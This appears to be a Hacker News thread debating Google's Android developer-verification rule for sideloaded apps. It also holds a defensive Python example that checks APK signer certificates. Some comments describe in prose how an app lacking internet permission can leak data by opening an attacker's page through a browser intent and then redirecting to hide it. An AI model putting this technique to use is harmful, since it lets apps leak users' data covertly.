That's not the problem. It's the bootloader locked hardware and the TPM anti-"tampering" security verification that more and more apps require.
It's not just the OS makers. They're also responding to the demand of companies and governments to control their users through them. They will not say "no".
The problem is moves like this will keep happening, since people don’t have much choice. Unless we bring up a societal trend of dumb phones.
We used to have strong consumer protection advocates on both sides of the Atlantic, and those consumer protection advocates used to influence laws and regulation which forced corporations to stop doing anti-consumer stuff like this. Those days can return with enough organized labor and solidarity among the working classes.
I had to do some light research on Wiki, but it looks like Firefox OS was supposed to fill part of this void. Sadly, it was not successful, and the project lost funding and support from Mozilla. I think if Mozilla could not do it, it seems hard to imagine there is an open source org with more talent and money than Mozilla who can make it work.
It's not necessarily that Mozilla could not do it. Just look up Mozilla's revenue sources.
Sailfish tried and failed. Various Linux distros also tried and failed even harder. Consumers at large just aren't interested in anything other than iOS and Android.
Consumers are interested in everything new.
The problem is - Linux (outside of server land and maybe SteamOS) is everything but (regular) user friendly.
When people buy a new phone they expect a smooth experience without any major inconveniences and uniform UI. And apps. Lots of apps. Full of features and mature UI. Linux mostly has none of it.
Users need a new feature or a new power to justify transition. Learning of new OS is not free. Someone should reuse Android UI, but upgrade the OS to full Linux.
It’s like uber, doordash or carvana, you can’t fund a huge project like this without free money. ZIRP is the moat.
There's already open source OSes that run on phones that aren't based on Android.
Off the top of my head there's a Debian based one, a Fedora based one, webOS, PostmarketOS, probably others. Wouldn't be that difficult but yeah, the cost of entry is still probably tens of millions.
use a fork. GrapheneOS is amazing. I feel like I own my phone, I trust my phone, and it obeys me, for the first time in a decade.
unlock. flash. spread the word. use the fork, Luke.
This is also no long term solution. GrapheneOS can't diverge from Google android too much, otherwise modern apps stop working. And Google will definitely go for alternative roms next.
They don't understand sideloading, but you know what they understand?
Weird apps that block your phone and show ads constantly (yes this exists)
Typosquatting apps
Apps that hold your phone for ransom if you don't pay a certain debt (yes this exists) https://www.welivesecurity.com/en/eset-research/beware-preda...
> most normal people... don't even understand what sideloading is
Actually, they understand it just fine. The concept is very simple too.
Before this change you could install Android apps without registering your passport/driving license with Google.
After this change you will have to tell Google your real name and home address to install anything on your Android device. This is all. It can take a convoluted form of registering Google account or a more direct form of sending Google your identity documents to confirm "developer privileges". But you will no longer be able to use non-hacked Android devices to install anything without doing those steps.
P.S. I recall that some people still believe that they can create Google account without giving Google your personal details, phone etc. This is simply a self-delusion. If Google does not immediately demand you to cough up a phone number under pretense of "suspicious activity", that's because they already know who you are (you probably told them yourself by registering another account elsewhere).
No, "burner SIM cards" aren't real. This is just another form of self-delusion, — this time architected by US security agencies. You don't become anonymous by using those, you become watched.
Define "normal people". Due to Chinese phones and sanctions and other geopolitical bullshit a significant part of the world is forced to use alternative app stores already. Yes, these people are very aware of "sideloading". (Due to Google's own previous moronic foot-shooting policy.)
> How can we fix this?
turn people onto sideloaded apps. show them Revanced and NewPipe, show them system-wide ad blockers and bloatware removal and every other thing Google doesn't want plebs to use.
people don't care about "apk side-loading," they care about apps. hook them on forbidden apps, and they'll raise hell when they can't side-load them anymore.
This is the solution.
It's like napster and torrenting. People don't care about the tech behind it - they care about the outcome.
It's just that the majority of normies don't even know it is possible (and didn't think an alternative exists to sideload).
Official announcement: https://android-developers.googleblog.com/2025/08/elevating-...
More info:
https://developer.android.com/developer-verification
https://support.google.com/googleplay/android-developer/answ...
Personally...we all know the Play Store is chock full of malicious garbage, so the verification requirements there don't do jack to protect users. The way I see it, this is nothing but a power grab, a way for Google to kill apps like Revanced for good. They'll just find some bullshit reason to suspend your developer account if you do something they don't like.
Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
> we will be confirming who the developer is, not reviewing the content of their app or where it came from
This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
TFA had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
On the flip side, that's one less platform I care about supporting with my projects. We're down to just Linux and Windows if you're not willing to sell your soul (no, I will not be making a Google account) just for the right to develop for a certain platform.
It's never about security (at least not user's security). It's like you pointed out only about power and locking in customers. They don't care if your phone gets hacked or your bank account drained. They care about the bottom line. Android is fine. Google should have 2 layers if they're worried: playstore 1 has only well vetted authors and apps, playstore 2 can be the free for all (mostly) of the current store. These could be two different apps or prominent tags. Choice is good, lock down is bad. Corporate does not like employees or customers to have freedom, that's why it's our duty to fire people like the current US regime who always side with corporations over customers.
This is a drastic response, but they didn't make up the security threat. Attackers convincing users to side-load malware is a thing.
https://www.bitdefender.com/en-us/blog/hotforsecurity/hacker...
The thing is that people sideloading good non-malware apps because they want to is also a thing, and all kinds of icky apps that abuse permissions but are still verified and installed through the Play Store are also a thing. This doesn't really change what is a thing. It just moves more stuff under Google's control.
security is the "Save the Children" of technology. It's not that there isn't a theoretical thing there, it's that in the real material sense, the actual actions taken are power grabs for control and suppression.
> Attackers convincing users to side-load malware is a thing.
Sure. It’s also not Google’s problem.
It’s not Victorinox’s problem if someone uses a Swiss Army knife to cut someone else. It’s not Toyota’s problem if someone deliberately runs over a pedestrian.
Car companies do care if their cars are easy to break into and will improve the security of newer models, even if any particular theft is not their fault.
If they don't do that then their reputation will suffer and governments might take notice. So, in practice, big companies do have to care about their users, not individually but in aggregate.
That's a bad analogy. No one is complaining about Google providing Android security updates.
This is like a car manufacturer preventing the installation of all unapproved aftermarket accessories by claiming they're protecting you from a stalker installing a tracker on your car.
I don’t actually think it’s that bad. If all of a sudden we started hearing an awful lot about Android phones having viruses, to the point where almost everyone had a friend who got a virus on their android. I think the market would actually shift. We’d probably see more people moving to iPhones.
> Car companies do care if their cars are easy to break into and will improve the security of newer models, even if any particular theft is not their fault.
Didn't Kia go over a decade without caring or improving until the Kia Boys stuff?
> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
You've never needed the internet permission to exfiltrate data. Just send an intent to the browser app to load a page owned by the attacker with the data to be exfilled in the query parameters.
Wouldn't that launch the browser app and bring it to the foreground? I wouldn't compare that to having full network access.
It'd launch the browser app. You can have your evil page redirect to a benign page so it just looks like Chrome randomly opened or whatever. It is not as powerful as full network access as you can only send so much information in query parameters, but if you are doing some phishing or stealing sms 2fa codes or whatever then it is plenty to send back whatever payload you wanted to.
And of course basically every app requires internet permissions for ordinary behavior. The world where an explicit internet permission would somehow get somebody to look askance at some malware that they were about to download is just not believable.
The ability to launch other apps can be put behind a permission screen too.
> had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
I don't think we can know for sure before the change is actually in place. Going through Play Protect would certainly be the easiest way of implementing this - it would be a simple change from "Play Protect rejects known malware" to "Play Protect rejects any app that isn't properly notarized". This would narrowly address the issue where the existing malware checks are made ineffective by pushing some new variant of the malicious app with a different package id.
It's a big change for the ecosystem nonetheless because it will require all existing developers to register for verification if they want to publish a "legit" app that won't be rejected by any common Android device - and the phrasing of the official announcements accurately reflects this. But this says nothing much as of yet about whether power users will be allowed to proactively disable these checks (just like they can turn off Play Protect today, even though very few people do so in practice).
> This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
Requiring company verification helps against some app pretending to be made by a legitimate institution, e.g. your bank.
Requiring public key registration for package name protects against package modification with malware. Typical issue - I want to download an app that's not available "in my country" - because I'm on a holiday and want to try some local app, but my "play store country" is tied to my credit card and the developer only made it available in his own country thinking it would be useless for foreigners. I usually try to download it from APKMirror. APKMirror tries to do signature verification. But I may not find it on APKMirror but only on some sketchy site. The sketchy site may not do any signature verification so I can't be sure that I downloaded an original unmodified APK instead of the original APK injected with some malware.
Both of these can be done without actually scanning the package contents. They are essentially just equivalents of EV SSL certificates and DANE/TLSA from TLS world.
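The package-name-to-key check described in the comment above, as an added example that is not part of the thread and not Google's implementation: it reads the signer certificate from an APK's v2 signing block and compares its SHA-256 against a registry, without looking at the app's contents. The registry format, the package name `com.example.bank` and the sample certificates are assumptions; the package name is passed in by the caller, and the APK's signature is assumed to have been verified already (for example with `apksigner verify`), since reading the certificate alone does not prove the contents are unmodified.

```python
import hashlib
import io
import struct
import zipfile

MAGIC = b"APK Sig Block 42"
V2_BLOCK_ID = 0x7109871A  # APK Signature Scheme v2 entry in the signing block

def find_eocd(apk):
    """Offset of the ZIP End of Central Directory record."""
    pos = apk.rfind(b"PK\x05\x06")
    if pos < 0 or pos + 22 > len(apk):
        raise ValueError("not a ZIP file")
    return pos

def read_prefixed(buf, off):
    """Read one uint32-length-prefixed field; return (field, next_offset)."""
    if off + 4 > len(buf):
        raise ValueError("truncated length prefix")
    (n,) = struct.unpack_from("<I", buf, off)
    if off + 4 + n > len(buf):
        raise ValueError("length prefix runs past end of buffer")
    return buf[off + 4:off + 4 + n], off + 4 + n

def signing_block_entries(apk):
    """ID -> value pairs of the APK Signing Block that precedes the central directory."""
    eocd = find_eocd(apk)
    (cd_offset,) = struct.unpack_from("<I", apk, eocd + 16)
    if cd_offset < 32 or apk[cd_offset - 16:cd_offset] != MAGIC:
        raise ValueError("no APK Signing Block (unsigned or v1-only)")
    (size,) = struct.unpack_from("<Q", apk, cd_offset - 24)
    start = cd_offset - size - 8
    if start < 0 or struct.unpack_from("<Q", apk, start)[0] != size:
        raise ValueError("signing block size fields disagree")
    entries, off, end = {}, start + 8, cd_offset - 24
    while off < end:
        if off + 12 > end:
            raise ValueError("truncated ID-value pair")
        pair_len, block_id = struct.unpack_from("<QI", apk, off)
        if pair_len < 4 or off + 8 + pair_len > end:
            raise ValueError("malformed ID-value pair")
        entries[block_id] = apk[off + 12:off + 8 + pair_len]
        off += 8 + pair_len
    return entries

def signer_cert_digests(apk):
    """Hex SHA-256 of each v2 signer's first (signing) certificate."""
    entries = signing_block_entries(apk)
    if V2_BLOCK_ID not in entries:
        raise ValueError("no v2 signature present")
    signers, _ = read_prefixed(entries[V2_BLOCK_ID], 0)
    digests, off = [], 0
    while off < len(signers):
        signer, off = read_prefixed(signers, off)
        signed_data, _ = read_prefixed(signer, 0)
        _content_digests, p = read_prefixed(signed_data, 0)
        certs, _ = read_prefixed(signed_data, p)
        first_cert, _ = read_prefixed(certs, 0)
        digests.append(hashlib.sha256(first_cert).hexdigest())
    return digests

def check_pin(package, apk, registry):
    """Return 'match', 'mismatch' or 'unregistered' for this package name."""
    # Assumption: the caller has already verified the APK signature itself.
    expected = registry.get(package)
    if expected is None:
        return "unregistered"
    digests = signer_cert_digests(apk)
    ok = bool(digests) and all(d == expected.lower() for d in digests)
    return "match" if ok else "mismatch"

def build_sample_apk(cert_der):
    """Constructed input: a tiny ZIP with a v2-shaped signing block.
    Digests, signatures and public key are empty, so it is NOT validly signed."""
    def lp(b):
        return struct.pack("<I", len(b)) + b
    raw = io.BytesIO()
    with zipfile.ZipFile(raw, "w") as z:
        z.writestr("AndroidManifest.xml", b"<constructed/>")
    zip_bytes = raw.getvalue()
    eocd = find_eocd(zip_bytes)
    (cd_offset,) = struct.unpack_from("<I", zip_bytes, eocd + 16)
    signed_data = lp(b"") + lp(lp(cert_der)) + lp(b"")
    signer = lp(signed_data) + lp(b"") + lp(b"")
    value = lp(lp(signer))
    pair = struct.pack("<QI", 4 + len(value), V2_BLOCK_ID) + value
    size = len(pair) + 24  # pairs + trailing size field + magic
    block = struct.pack("<Q", size) + pair + struct.pack("<Q", size) + MAGIC
    tail = bytearray(zip_bytes[cd_offset:])
    # The central directory moves back by len(block); patch its offset in the EOCD.
    struct.pack_into("<I", tail, eocd - cd_offset + 16, cd_offset + len(block))
    return zip_bytes[:cd_offset] + block + bytes(tail)

# Constructed sample values, not real certificates or a real registry.
CERT_A = b"constructed certificate of the registered developer"
CERT_B = b"constructed certificate of whoever repackaged the app"
REGISTRY = {"com.example.bank": hashlib.sha256(CERT_A).hexdigest()}
```

A repackaged APK has to be re-signed, so it carries a different certificate and comes back as `mismatch` for the registered package name.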
> Typical issue - I want to download an app that's not available "in my country" - because I'm on a holiday and want to try some local app,
The solution here is just to get rid of artificial country limitations which make some users download APKs. None of those make sense in the online world anyways.
Doesn't Windows have the same thing aka Code Signing?
https://www.electronforge.io/guides/code-signing/code-signin...
You can install unsigned apps on Windows just fine, maybe with one extra nag screen. Plenty of large open source projects don't sign their installers - VLC being one big example that many normal people use.
Play Protect is just spyware to monitor app usage & exploitation. It doesn't prevent or protect anything.
<< we will be confirming who the developer is, not reviewing the content of their app or where it came from
To be honest, it almost makes me wonder if the issue here is not related to security at all. I am not being sarcastic. What I mean is, maybe the issue revolves around some of the issues MS had with GitHub (sanctions and KYC checks).
So KYC but C is “competition”.
And K is "kill".
There's a reason Google is targeting a few specific countries with this first. Malware from APKs downloaded from the internet is more prominent in some countries than in others. The governments themselves are asking for this because educating the public has turned out to be an impossible task for them.
Still an awful solution that will get bypassed easily, of course. But there's more to this than "Google decided to be a bunch of dicks today".
The malware makers will use fake or stolen IDs.
Can you elaborate a little bit about this hidden internet access control setting?
You can deny internet to any specific app.
<uses-permission android:name="android.permission.INTERNET" />
It's been there since Android 1.0.
What's missing is a way for the user to deny it.
Google also used to show you which apps used Internet permission in Play Store. But they removed it, which makes it harder to notice which apps don't use it.
Google mostly doesn't let you deny permissions while running apps that require them; recently there's some permissions that you can pick at runtime. So it's not surprising that they don't let you deny this one, when they don't even show it in the store.
You can deny it on Graphene OS.
Interesting, you can't deny it on stock Android? TIL. You can on LineageOS.
Even device owner (MDM) apps can't revoke that permission.
"Hidden" isn't exactly right. It's completely inaccessible, unless you use a custom ROM like LineageOS. But it is a real permission:
https://developer.android.com/develop/connectivity/network-o...
Force enabled, more like
> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps
Or that they still refuse to sandbox the play store.
It's easy to see that there's a pattern on what they are copying from GrapheneOS.
> But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
The internet permission has nothing to do with ads? It's a hidden permission because:
1) Internet connection is so ubiquitous as to just be noise if displayed
2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
It absolutely has to do with ads. While there are various ways to exfiltrate small amounts of data, the non-collaborative ones are rarely silent and most importantly, they won't let the app get responses (e.g. ads) back.
The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
> The main thing this permission would be used for would be blocking ads.
This permission has existed for longer than runtime permissions. You have never been able to revoke it, it was just something you agreed to when you installed the app or you didn't install the app.
It was "removed" in that era because if every app requests the same permission, then nobody cares about it anymore. When every app asks for the same thing, users stop paying attention to it. So no, it had fuck all to do with ads because that was never a thing in the first place. And ad blocking doesn't require this permission, either.
> Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
You can still use it for this. Apps are required to declare the permission still, it's listed on the Play Store under the "permissions" section. Similarly the OS reports the same thing. Presumably F-droid or whatever else also has a list of permissions before you install, and it'll be listed there.
Although Google's own Calculator app requires Internet permission. Take that for what it's worth.
> 1) Internet connection is so ubiquitous as to just be noise if displayed
That doesn't make it any less useful.
> 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?
> I've never managed to find even a single PoC bypassing it
Because it is obvious. Just open a web browser.
More details here: https://old.reddit.com/r/androiddev/comments/ci4tdq/were_on_...
> I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.
Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.
> would be a catastrophic change to the ecosystem.
Hey we were already on board with this, you don't have to convince us.
The effect of this would be to make all apps request all permissions because even if you are just using some other app for a particular feature you need, you have no control over what other permissions they might add which would suddenly break any intents you send them. The only defense would be to request everything.
You could very specifically ban ACTION_VIEW intents for web URIs from apps without an internet permission I guess. But does banning apps from linking to the web (to be opened in browsers) really seem like a good idea?
Similar changes have been done before, the security sandbox behaves differently based on the app's minimum/target API level for backwards compatibility.
That's also why there's a warning before installing really old apps, they may run with extra permissions.
So? Pop up a permission prompt. Have the user confirm.
And isn't it immediately apparent that the app is leaking data if your calculator is popping a webview?
"Pop up a permission prompt every single time an app links out to a browser" is not going to be a thing that users like.
Yes, this is a little suspicious. But you just have the evil page redirect to google.com or something benign. To the user it looks like "huh, chrome just opened on its own."
I mean, I just did a quick look over the installed apps on this phone and ~1/4 of them would work perfectly well without an internet connection, things like a level or GPS speedometer that use the phone sensor or apps for Bluetooth control of devices [like 0]. Why would something like a bubble level app need internet access for anything besides telemetry or ads? I realize I have way more of these types of apps than the average user, but apps like this aren't a super-niche thing that would be on 0.1% of devices.
I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.
There's plenty of actually problematic stuff Google does (like this change in the article), there's no need to make up whack ass conspiracy theories, too.
The internet permission is the only regular manifest permission you can't toggle in the settings. It is an obvious win for an advertising/surveillance company like Google. What is wack about it?
> The internet permission is the only regular manifest permission you can't toggle in the settings.
That's not even a little bit true? There's a ton of 'normal' permissions, almost none of which are user-overrideable. Like, say, android.permission.VIBRATE. Or android.permission.GET_PACKAGE_SIZE. Android has an obscene number of permissions ( https://developer.android.com/reference/android/Manifest.per... ) and almost none of them have a UI to control them nor any ability to be rejected
> It is an obvious win for an advertising/surveillance company like Google. What is wack about it?
How, exactly? How does Google benefit from random 3p apps having Internet access? And remember, Google has play services on every device to proxy anything it needs/wants.
Huh? Not sure how this qualifies as "whack ass". There's an internet permission built in to the OS that Google chose to not expose to the user. The parent poster was claiming there is no reason anyone would want that permission, I then pointed out a whole category of apps that don't need internet to function for anything besides ads and telemetry. All of this is factual info.
So rather than just dismissing the argument via insulting language, can you provide a reasonable alternative explanation for why this setting isn't exposed to the user?
The internet permission is exposed to the user, it just can't be revoked by the user. But that's true of like 100 other permissions, too. It's the default case that permissions are not revokable.
And I did provide 2 reasons why that's the case for Internet specifically, neither of which were even attempted to be refuted in this comment chain
I would really like to deny internet access for apps like mx player. The frequency of ads on that app once Times group bought is the worst I've seen in my entire life. One of the best video players on Android, ruined.
Some Chinese skins do offer the ability to revoke internet access for apps. I wonder why the western ones don't?
The solution is easy, stop developing for closed platforms:
You now have options for cheap (less than $200) portable low energy devices:
1. PineTab-V, a Linux on RISC-V tablet. (Got Debian a few months back, still waiting for proper GPU support, usable but slow now)
2. uConsole, a Linux cyberdeck with optional 4G. (Also has Debian for 2711, 2712 and 3588 Compute Modules)
I'm not porting my games to Android, iOS, Switch or PlayStation. Only Windows/X86 and Linux/ARM+RISC-V.
No Linux/X86 to not encourage power waste after Windows gets too expensive to run on the client side.
You only need Android for banking, and Nokia G22 is/was also sub $200.
I am now creating a new Google account for each phone, that way you are not the product any more.
But can still operate in society.
The worst part is the Orwellian opening sentence they start with in their blog post [0]:
> You shouldn’t have to choose between open and secure
2+2=5
Truly the end of an era. I've spent nearly two decades buying Android phones because of a single checkbox in settings that let me have the freedom I consider essential to any computing device that I own.
In a way, it's liberating, I've missed out on a lot from the Apple ecosystem because of that checkbox. Maybe finally I can let go of it now the choice is out of my hands.
[0] https://android-developers.googleblog.com/2025/08/elevating-...
Very much my exact feelings. I had the first Android phone ever and even wrote my own APKs and enjoyed the freedom of the mobile platform that let me install my own software. But it's been close to 20 years and maybe it's time to check out the other side, as much as I despise Apple's locked down ecosystem.
I'd sooner get a Chinese phone that isn't "Google-certified" than reward this behaviour by giving $1000+ to the DRM OGs at Cupertino. Neither Apple nor Google are protecting users against the alleged data-stealing evils of Tiktok, so how exactly are they providing any kind of "user safety" by throwing up fees and red tape for small independent developers?
I'm also completely open to this. Google just made being not Google-certified a feature.
Maybe it is time to try Jolla as next phone:
https://jolla.com/
Just a note for readers that the Jolla C2 cellular modem only supports European bands, so if you're in the US you're out of luck on that front until they release a new model.
Jolla is trying to release a new model in 2026: https://forum.sailfishos.org/t/next-gen-jolla-phone/23882
If there's enough interest in US, then they may release it there, too.
Oh... I somehow missed this reading for 15 minutes through the site. Thank you!
I used it as my first phone some 10 years. I type this message on one. I like their perseverance, but the truth is it's declining in practical usability.
Edit: In EU, so (lack of) bands are not an issue for me.
Yes, I was checking this out! Sailfish with Android compat seems very compelling. The videos I saw on youtube showed a bit less polish than I'd prefer, but I'd be OK with that. But then I read up on the manufacturer they partnered with. Reeder, I believe? I ended up looking up some other devices they made and there seems to be build quality problems...I haven't seen reports like this for the Jolla C2, though, so I still might be tempted to purchase one just to see how it drives. Thanks for the recommendation!
So that's it then.
If this actually goes through, there will be no option in the mobile OS market for an OS that both:
a) allows the installation of apps without any contractual relationship with any party, and
b) allows the use of mainstream and secure apps like banking
In time, you will only be able to access banking from your desktop using an approved OS and browser with attestation...
For what conceivable reason would they make the users go on desktop, considering mobile is in the process of being fully locked down?
If anything, they'd eventually deny access from desktop, forcing everyone to log in via the fully managed mobile devices without any user freedom.
Some banks are already getting there btw, as their preferred 2fa is a companion app... One small step away from making that the only option, effectively denying access to anyone without a locked down mobile device.
A recent real life example:
You can apply for an HSBC Global Money Account if you have: […] The HSBC UK Mobile Banking app (Global Money is only available via the app)
From https://www.hsbc.co.uk/current-accounts/products/global-mone...
It's already that way in my country. The few banks that still have the web version only support it for their business clients, and it's only something like two or three banks. If you're a regular client, there's not a single bank left that you can still use without a smartphone (unless you're ready to visit a branch for every little thing — so pretty much daily).
My bank’s app doesn’t even work or even install on my phone because the bank considers my phone too old. So if they suddenly required the app to log in, I simply wouldn’t be able to bank with them. So they would lose my checking, investment, and HSA business when I move to another bank.
I think they worded that poorly, but didn't mean what you got from it: the point I'd take isn't that they will require you to have a desktop, but that even desktop will also have the same restrictions, so it isn't just a mobile problem.
What GP is saying is that to access banking from desktop will require an approved OS and attestation just like on mobile. The current state of affairs is that an approved OS and attestation are only required on mobile but not on desktop.
Actually my bank already requires me to use the phone app for any operation on the website. When I want to login from my laptop I need to use my phone with their app to approve the login, same for almost any operation.
Ah, and it can only be installed in one device at the same time :D Don't have your phone available? Bad luck for you
> can only be installed in one device at the same time
I neither like nor understand this restriction. It makes device failure / loss / theft a much more difficult experience to recover from than it would otherwise be. The device should be throwaway. I specifically keep old phones in case something happens to the new one.
WhatsApp is probably the stupidest example of only being able to be on a single device (but I'm forced to use WhatsApp for one specific purpose, so I already resent it). Signal does the same thing, so maybe it's related to the E2EE that WhatsApp licensed from Signal...
I use the Signal fork Molly to get messages on multiple phones. One remains the primary and the others linked, but I get messages even if the primary is off.
I have a huge problem with companies using their own apps for 2FA.
Google started doing this for Gmail. To use Gmail on my laptop, I need to approve it with Gmail on my phone. I never signed up for this. I’m now afraid if I delete the Gmail app from my phone that I’ll lose access to my email.
I hate the direction “security” is taking us. It’s done in the name of security, but it feels more like blackmail to get and keep the company app on your phone.
Is that a thing Google logins can be set to require? I _can_ use the Gmail app on a device for 2FA, I can also press "try another method" and use any 2FA app.
I do like how many apps are starting to play nice with 3rd party authenticators. I use MS Authenticator for a bunch of things. Although knowing MS it has some massive license fee for them to support.
De facto, this is already the case - you can use your computer as a display but to actually authorize a login or transaction you need your phone with said attestation.
Not true for either my AIB or Wise account.
True for PayPal though. I just recently had to jump through seven different hoops to verify my ID (with creepy, creepy face scans) and they absolutely refused to even start the process on desktop. Eventually got the stupid thing to work on my iPad; Android+Firefox was a no go, and it's stock Pixel 5a with Google OS.
Thankfully I don't actually rely on PayPal for anything serious, but there are artists whose commission I like to pay, and being able to actually pay them would be nice. :/
For logins, at least, they support passkeys on the desktop as well, so long as the browser does it. Which basically means Win11 or macOS, either some Blink-based browser or Safari.
I mean, I'm sure it's true for some banks or financial services, but that's not really the same thing.
A dedicated app on a locked down OS is vastly more controllable than something like a browser that can do virtually whatever it wants.
Controllable by whom? I don't do any banking on my phone exactly because I don't trust my phone to keep anything I do on my phone private.
I'll just have to disable it and choose a banking app that works on the browser. Tonnes of my apps are sideloaded. Quite a few are on the playstore or the dev might upload their details.
Is it confirmed that we will even be able to disable this?
I never really got into "phone" programming, always waiting for the shenanigans to die down. But somehow the shenanigans have gotten worse and for a significant chunk of the world population, the phone is the only computation device they have at all.
I never got into it because I was convinced developers would refuse to give up control over distribution when Apple started doing it. I wish I was right, but here we are.
Developers sometimes seem to be as in control as farmers are of the distribution of their produce. There's no absolute rule that gives the owners of large scale distribution networks power over both producer and consumer. It's just laws of convenience. It's easier for everyone to go through a few or just a single common broker.
There's no law against a more democratic way to implement the broker either but it requires interesting methods of coordination and/or decision making that doesn't seem to exist yet?
It limits choice. I don’t have any experience building mobile apps because I didn’t want to buy into an unfair ecosystem. That means fewer mobile apps even if distribution networks change tomorrow.
> I don’t have any experience building mobile apps because I didn’t want to buy into an unfair ecosystem
Seems like it wouldn't be much of a stretch to compare that statement to not starting a business because the economy is unfair. People indeed don't start businesses when the bureaucratic or tax overhead outweighs the financial benefit, but nobody loses sleep over an individual's hypothetical missed opportunity to learn a new skill but them. Doesn't matter to the platform owners unless it also stops being profitable, so it's their job to maintain the profitability for their ecosystem despite whatever barriers they put up.
> There's no law against a more democratic way to implement the broker either but it requires interesting methods of coordination and/or decision making that doesn't seem to exist yet?
It's not enough to not have a law against it, we need to have and enforce laws requiring it.
Some developers did. Others, who didn't care so much, got into the app store instead, and got rich off it. Users didn't care about such principles and mobile-first has been a viable strategy for a long time now. Not having something of an app is a problem if you want to stay in many markets.
Money is a powerful motivator. For better or worse.
Developers want a stable, secure platform where they can reach customers that trust the platform and are willing to transact. Everything is downstream of that, including any philosophy around control.
Developers are businesses and the economics need to work. For that, safety and security is much more important than openness.
Oh! Classic Survivorship bias. You're only looking at the devs who went into business in the phone ecosystem in the first place. I'm thinking that they're there despite the barriers to entry ('shenanigans'), and the ones you encounter happen to be those who happen to place a higher value on 'other values'. As the ecosystem gets locked down more, this effect becomes stronger.
Meanwhile, you're not looking at those who left, or those who decided to never enter a broken market dominated by players convicted of monopolistic practices.
This seems much more intuitive than a hypothesis where somehow people would prefer to enter a closed market over a fair and open market with no barriers to entry.
Remember, monopolists succeed because they are distorting the market, not because they are in fact the most efficient competitor.
* https://en.wikipedia.org/wiki/Survivorship_bias
You now need to have an online account to set up and log in on a Windows desktop. It's obvious what the trend is and it's not allowing consumers control over their stuff.
Not related to the OP, but no you don't.
Just look up how to skip the "OOTB (out of the box) experience" and you can still bypass having to set up a cloud account on Windows 11 and can just set up a local account like normal. :)
I have been a computer user, developer and a system administrator for longer than I care to recount. I don't like Windows and I don't use it at work or home. But I do encounter it from time to time, and the experience is worse each time. The last time it happened, I couldn't figure out the way to skip/bypass the cloud account set up. Would it have been possible if I tried harder, starting with a web search? Perhaps. But there is no way an average system user is going to have the patience or often the skill necessary to do it. I'm not challenging their intelligence. But people have other priorities than to jump through a dozen hoops just to preserve privacy. I would do the same if I had to set up a Windows system for urgent work.
These sorts of hurdles exist to push more and more users to their favorite workflow until the dissenting voice is too feeble to notice when they finally pull the plug on the straightforward method. The intent is certainly there, since they are quite evidently boiling the frog. Just wait for the fine day when you wake up in the morning to see an HN story just like this one about Windows login as well.
Last I checked, Microsoft was trying to get rid of it.
https://www.tomshardware.com/software/windows/microsoft-elim...
It's still possible to set up using only a local account, but who knows for how long.
A stepping stone on a path.
Have a login. Pin features to a login. Mandate a login but w/ backdoor. Close the back door. "It's a backdoor, why not use the front door?"
For now. History has shown that workarounds for defaults tend to stop working at some point.
Software distribution control didn't start with phones, it started with game consoles.
The Nazis were initially quite squeamish about taking the lives of innocent civilians. It was in 1939 that a Nazi supporter wrote to Hitler requesting permission to euthanize his severely disabled infant son [1], who he described as 'a monster'. Hitler sent his personal physician Karl Brandt to Leipzig to assess the situation. Upon confirmation, Hitler personally authorized Brandt to arrange the euthanasia, with the promise to protect him legally. Don't forget that these were the Nazis, the original.
Once that happened, they gradually tried the idea with other disabled children, eventually progressing to deceiving the parents to get the permission. Then it got extended to teenagers and eventually adults, including disabled war veterans. Then there was a backlash and it stopped for a while. But it reappeared eventually, this time on an industrialized scale - the final solution. Disabilities were not the limit anymore. Arguably the worst genocide in human history started with the reluctant murder of a 5 month old infant, just 6 years before reaching its peak at the end of the war.
This is the classic example of a slippery slope. One hesitant misstep is the beginning. But as they realize its benefits (to them), they double down and gradually expand the scope until nothing is exempted. The consumer electronics industry and the software industry are certainly no exceptions to this. Is it too dramatic and hyperbolic to compare them to the Nazis? Admittedly, a bit. But perhaps it's not a bad idea to shame them like that, because clearly nothing else is working (with all due respect to the victims of the original). And it's not like they hesitate to shame us when it suits them.
[1] Gerhard Herbert Kretschmar (20 February 1939 – 25 July 1939): https://en.wikipedia.org/wiki/Gerhard_Kretschmar
Personally: the idea that a "slippery slope" is a logical fallacy has always seemed like bullshit to me. The vast majority of reasoning for why the judiciary makes the decisions it does is because of "precedent". Slippery slope is how the world operates. It surfaces everywhere, and when the slope we're sliding down matters, like this one, we have to fight back with fervor. Google isn't doing this in a vacuum; they're doing this because there's precedent for it, and because all they want is to assert more power over the world.
